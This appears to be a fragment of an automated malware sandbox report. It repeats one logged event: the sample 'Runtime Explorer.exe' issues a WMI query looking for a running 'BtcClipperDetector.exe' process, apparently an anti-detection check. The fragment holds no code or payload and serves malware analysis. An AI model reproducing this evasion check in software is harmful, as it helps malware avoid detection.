              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
